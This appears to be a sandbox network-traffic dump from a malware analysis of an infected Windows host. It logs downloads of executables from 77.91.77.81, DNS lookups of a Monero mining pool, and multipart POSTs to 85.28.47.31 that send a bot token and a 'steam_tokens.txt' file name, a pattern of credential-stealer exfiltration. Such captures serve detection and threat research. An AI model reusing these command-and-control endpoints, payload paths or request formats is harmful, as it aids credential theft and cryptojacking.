Jul 24, 2024 02:39:54.042900085 CEST	1.1.1.1	192.168.2.4	0x53e	No error (0)	a17.rackcdn.com	a17.rackcdn.com.mdc.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:40:22.820771933 CEST	1.1.1.1	192.168.2.4	0x7ebc	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:40:23.012226105 CEST	1.1.1.1	192.168.2.4	0x1735	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:40:43.474077940 CEST	1.1.1.1	192.168.2.4	0x6c6f	No error (0)	pool.supportxmr.com	pool-fr.supportxmr.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:40:43.474077940 CEST	1.1.1.1	192.168.2.4	0x6c6f	No error (0)	pool-fr.supportxmr.com		141.94.96.71	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:40:43.474077940 CEST	1.1.1.1	192.168.2.4	0x6c6f	No error (0)	pool-fr.supportxmr.com		141.94.96.195	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:40:43.474077940 CEST	1.1.1.1	192.168.2.4	0x6c6f	No error (0)	pool-fr.supportxmr.com		141.94.96.144	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:40:58.512953043 CEST	1.1.1.1	192.168.2.4	0xea10	No error (0)	pool.supportxmr.com	pool-fr.supportxmr.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:40:58.512953043 CEST	1.1.1.1	192.168.2.4	0xea10	No error (0)	pool-fr.supportxmr.com		141.94.96.195	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:40:58.512953043 CEST	1.1.1.1	192.168.2.4	0xea10	No error (0)	pool-fr.supportxmr.com		141.94.96.71	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:40:58.512953043 CEST	1.1.1.1	192.168.2.4	0xea10	No error (0)	pool-fr.supportxmr.com		141.94.96.144	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:41:11.124505043 CEST	1.1.1.1	192.168.2.4	0x6ef9	No error (0)	pool.supportxmr.com	pool-fr.supportxmr.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:41:11.124505043 CEST	1.1.1.1	192.168.2.4	0x6ef9	No error (0)	pool-fr.supportxmr.com		141.94.96.144	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:41:11.124505043 CEST	1.1.1.1	192.168.2.4	0x6ef9	No error (0)	pool-fr.supportxmr.com		141.94.96.71	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:41:11.124505043 CEST	1.1.1.1	192.168.2.4	0x6ef9	No error (0)	pool-fr.supportxmr.com		141.94.96.195	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:41:29.777429104 CEST	1.1.1.1	192.168.2.4	0xa655	No error (0)	pool.supportxmr.com	pool-fr.supportxmr.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:41:29.777429104 CEST	1.1.1.1	192.168.2.4	0xa655	No error (0)	pool-fr.supportxmr.com		141.94.96.71	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:41:29.777429104 CEST	1.1.1.1	192.168.2.4	0xa655	No error (0)	pool-fr.supportxmr.com		141.94.96.144	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:41:29.777429104 CEST	1.1.1.1	192.168.2.4	0xa655	No error (0)	pool-fr.supportxmr.com		141.94.96.195	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:39:10.232273102 CEST	77	OUT	GET /mine/amadka.exe HTTP/1.1 Host: 77.91.77.81 Cache-Control: no-cache
Jul 24, 2024 02:39:11.060828924 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:39:10 GMT Content-Type: application/octet-stream Content-Length: 1879040 Last-Modified: Wed, 24 Jul 2024 00:04:15 GMT Connection: keep-alive ETag: "66a044ff-1cac00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 a0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELafJ@J @XlJxJ @.rsrc@.idata @ @*@xfxaajvq0@zhkwsvqaJ@.taggant0J"@
Jul 24, 2024 02:39:11.060887098 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 24, 2024 02:39:11.060925007 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 24, 2024 02:39:11.060957909 CEST	672	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 24, 2024 02:39:11.060992002 CEST	1236	IN	Data Raw: 8e 9a bf b4 a0 d1 09 15 e8 d2 27 05 da b0 04 73 59 de 1b 33 d4 d2 be 1a 84 a2 e0 27 b9 38 22 34 1e d1 ab 27 b0 43 70 65 89 09 01 b1 0f 3c 26 cd b1 86 11 fc 32 3a 3e 31 40 69 c4 a6 01 52 7f 41 d5 b9 de 7c 52 51 6f ac b6 d4 7f 1d 61 2e f2 14 a1 e3 Data Ascii: 'sY3'8"4'Cpe<&2:>1@iRA\|RQoa.GEO7TV7zba"%N7sDZ[0C6"W!:&a0V}e!B`m&oQ =E\|w}%Q'#`~T:[{/[hT c`)
Jul 24, 2024 02:39:11.061026096 CEST	1236	IN	Data Raw: 79 c5 01 d5 1d a4 6f dd d7 a2 de fc 51 fe 88 58 de d1 27 fd 89 a6 12 c5 f2 be 7f 91 c9 a9 29 f0 81 72 43 55 96 c5 07 5a ce 82 61 ec 23 b2 01 85 b0 ee 1b 54 b3 f3 bf 54 f9 bd ef b4 af da f9 56 02 cd 61 9a ef d0 1f 90 ff c9 2f bf 15 d2 47 09 df a2 Data Ascii: yoQX')rCUZa#TTVa/G1hX>QS_DJ@rU?iQW0YouzRo>}ZTp&o7".UVzWTp/h>^PS:ne!zo}nX<y\|>Q/BTY'U
Jul 24, 2024 02:39:11.061060905 CEST	1236	IN	Data Raw: f5 9f 0a 11 c0 96 7d f2 fb 88 fb 35 5e 3b 2d 21 d5 f6 d4 01 dd a7 ab 8d 3d cf b5 40 1a 8e da 4a 09 86 63 53 0f 9e 5f 2c ff 79 03 0d bc 80 e0 55 fb cf fb f4 36 09 f8 eb 61 18 02 39 b2 82 77 bd f1 2d a6 2a c9 e0 34 ea 77 0c d2 95 a2 fd e5 d2 97 b7 Data Ascii: }5^;-!=@JcS_,yU6a9w-*4wu04@,@3zH.9aEGvs}LvwY7B}MFcP@x<qQRs])~Irj4qg-fVqm/XiES#KCsf" 0zX#G(B
Jul 24, 2024 02:39:11.061094046 CEST	1236	IN	Data Raw: b6 63 aa 16 33 3b 87 85 61 c2 88 71 31 93 ef 42 1c f7 5a 34 24 bf 4d 76 8e 8d 05 f8 1a ce c0 70 9c ac 3b 00 1d 23 d8 b2 ca 9e f5 56 a3 30 7f 76 fa 85 d4 04 fa 1e 7b 85 d4 f0 3f 3f af 37 37 42 cb 44 cf 68 49 05 6f 7f 8e a8 37 59 81 fa 89 57 13 f3 Data Ascii: c3;aq1BZ4$Mvp;#V0v{??77BDhIo7YW=;8&6-J"1.:/k*q%<kQ12`7[^AKg#?:r9q bo^D>q3nD4Zl1=<(967Rl
Jul 24, 2024 02:39:11.061127901 CEST	1236	IN	Data Raw: cf da 61 a6 29 a6 68 b2 98 ea 36 29 1e 96 d1 70 a7 cd 25 fc df 95 7e f9 06 96 71 15 4a f6 23 34 0f 67 4e c6 ce d3 72 7f 4a f9 d4 0e bc d0 07 45 31 23 46 19 d1 4e 4b 8f b1 bc 8b c4 f9 88 36 b5 b7 d1 83 10 5a 82 f8 a2 49 5c ad 5f 0c 66 7e 7c cc fa Data Ascii: a)h6)p%~qJ#4gNrJE1#FNK6ZI\_f~\|_15DJ-G>kvP>`pD/7'4j;lHlbeSXT3r8uE?2f7C/UFq7T0D?[~#CVf}9@un"=Jsbz%I_
Jul 24, 2024 02:39:11.061161041 CEST	1236	IN	Data Raw: b2 16 44 2f e9 83 3d 2f a3 a2 b6 3a b6 6f b7 fe 20 ac e8 43 91 8c 59 ef 8b 36 eb 73 c0 a3 67 2f 81 14 27 b1 0c 3d c0 dc 3e 6c 8f 47 e6 20 f9 6e cc e3 b4 ee 54 7e f3 04 b0 b9 0d 79 ce 93 a9 70 20 dc 35 27 8a 5b 67 67 7d c2 23 3d 99 21 6e 56 b2 bd Data Ascii: D/=/:o CY6sg/'=>lG nT~yp 5'[gg}#=!nV#6Jwq;:Wr\|2:?J9?T.Urs{7DWui4!2oM-A.Mxf'"'x<}Rbgw`1J@K
Jul 24, 2024 02:39:11.061198950 CEST	1236	IN	Data Raw: 0f c7 85 70 bf 5c f9 73 c0 b9 33 37 4c 61 80 9e ee fc 27 7b bb 20 37 7d b7 89 55 f1 b7 03 40 e0 3c 56 3e 80 0d b5 cc 9c 31 3f 83 79 1d e9 79 e6 37 b5 26 73 1f 19 43 90 ff ea 8f 32 88 7a c7 92 96 ef 09 c9 58 5e 68 77 aa 2f 3f 45 78 56 5b 76 37 f8 Data Ascii: p\s37La'{ 7}U@<V>1?yy7&sC2zX^hw/?ExV[v7@nFgR1"r%/#?h"xT+vus6bxjrs>vXCO{DKF:a*{w pO=\|5S[{Eq}y_ _\|?lf,T?$
Jul 24, 2024 02:39:12.812604904 CEST	73	OUT	GET /cost/go.exe HTTP/1.1 Host: 77.91.77.81 Cache-Control: no-cache
Jul 24, 2024 02:39:13.033544064 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:39:12 GMT Content-Type: application/octet-stream Content-Length: 91648 Last-Modified: Wed, 24 Jul 2024 00:03:39 GMT Connection: keep-alive ETag: "66a044db-16600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 62 05 40 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 0c 01 00 00 56 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 71 01 00 c8 00 00 00 00 90 01 00 9c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELb@]2V0@\|qpt,.code78 `.textP< `.rdata304@@.data,pD@.rsrcV@@
Jul 24, 2024 02:39:13.162208080 CEST	77	OUT	GET /soka/random.exe HTTP/1.1 Host: 77.91.77.81 Cache-Control: no-cache
Jul 24, 2024 02:39:13.405196905 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:39:13 GMT Content-Type: application/octet-stream Content-Length: 1929728 Last-Modified: Tue, 23 Jul 2024 12:15:17 GMT Connection: keep-alive ETag: "669f9ed5-1d7200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2a cf 5e 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 70 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PEL*^fpL@L>@XlWLLWL @.rsrc@.idata @ P+@qhedmxhi`2Z@aflvgrfd`LL@.taggant0pL"P@

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:39:15.923311949 CEST	561	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCG Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 43 42 41 46 42 46 48 49 49 45 43 42 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 64 31 32 32 33 66 66 34 34 33 31 63 64 64 63 38 33 30 63 34 35 33 36 38 66 39 65 64 31 39 66 62 66 61 61 66 64 39 32 63 62 37 35 36 37 66 32 37 62 38 63 62 62 30 33 34 38 30 62 32 33 62 66 61 38 38 37 63 39 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 43 42 41 46 42 46 48 49 49 45 43 42 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 43 42 41 46 42 46 48 49 49 45 43 42 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------JEGHCBAFBFHIIECBKFCGContent-Disposition: form-data; name="token"52d1223ff4431cddc830c45368f9ed19fbfaafd92cb7567f27b8cbb03480b23bfa887c92------JEGHCBAFBFHIIECBKFCGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------JEGHCBAFBFHIIECBKFCGContent-Disposition: form-data; name="file"------JEGHCBAFBFHIIECBKFCG--
Jul 24, 2024 02:39:16.931209087 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 00:39:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 24, 2024 02:39:17.330605984 CEST	463	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJKFBKKECFHJKEBKEHI Host: 85.28.47.31 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 64 31 32 32 33 66 66 34 34 33 31 63 64 64 63 38 33 30 63 34 35 33 36 38 66 39 65 64 31 39 66 62 66 61 61 66 64 39 32 63 62 37 35 36 37 66 32 37 62 38 63 62 62 30 33 34 38 30 62 32 33 62 66 61 38 38 37 63 39 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------KKJKFBKKECFHJKEBKEHIContent-Disposition: form-data; name="token"52d1223ff4431cddc830c45368f9ed19fbfaafd92cb7567f27b8cbb03480b23bfa887c92------KKJKFBKKECFHJKEBKEHIContent-Disposition: form-data; name="message"files------KKJKFBKKECFHJKEBKEHI--
Jul 24, 2024 02:39:17.515902996 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 00:39:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 24, 2024 02:39:17.965609074 CEST	470	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD Host: 85.28.47.31 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 64 31 32 32 33 66 66 34 34 33 31 63 64 64 63 38 33 30 63 34 35 33 36 38 66 39 65 64 31 39 66 62 66 61 61 66 64 39 32 63 62 37 35 36 37 66 32 37 62 38 63 62 62 30 33 34 38 30 62 32 33 62 66 61 38 38 37 63 39 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 2d 2d 0d 0a Data Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="token"52d1223ff4431cddc830c45368f9ed19fbfaafd92cb7567f27b8cbb03480b23bfa887c92------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FCAAEBFHJJDAAKFIECGD--
Jul 24, 2024 02:39:18.507586956 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 00:39:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:39:27.667171955 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jul 24, 2024 02:39:28.140940905 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Tue, 23 Jul 2024 09:24:28 GMT Age: 54900 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jul 24, 2024 02:39:38.158978939 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:39:48.174412012 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:39:53.136761904 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jul 24, 2024 02:39:53.237693071 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Tue, 23 Jul 2024 09:24:28 GMT Age: 54925 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:39:28.182401896 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jul 24, 2024 02:39:28.635212898 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Tue, 23 Jul 2024 00:48:10 GMT Age: 85878 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Jul 24, 2024 02:39:38.646506071 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:39:48.665185928 CEST	6	OUT	Data Raw: 00 Data Ascii:

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:39:53.261898994 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jul 24, 2024 02:39:53.716762066 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Tue, 23 Jul 2024 00:48:10 GMT Age: 85903 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Jul 24, 2024 02:39:54.037262917 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jul 24, 2024 02:39:54.134315014 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Tue, 23 Jul 2024 00:48:10 GMT Age: 85904 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Jul 24, 2024 02:39:54.158752918 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jul 24, 2024 02:39:54.256758928 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Tue, 23 Jul 2024 00:48:10 GMT Age: 85904 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Jul 24, 2024 02:40:04.264779091 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:40:14.284668922 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:40:24.307775974 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:40:24.824812889 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
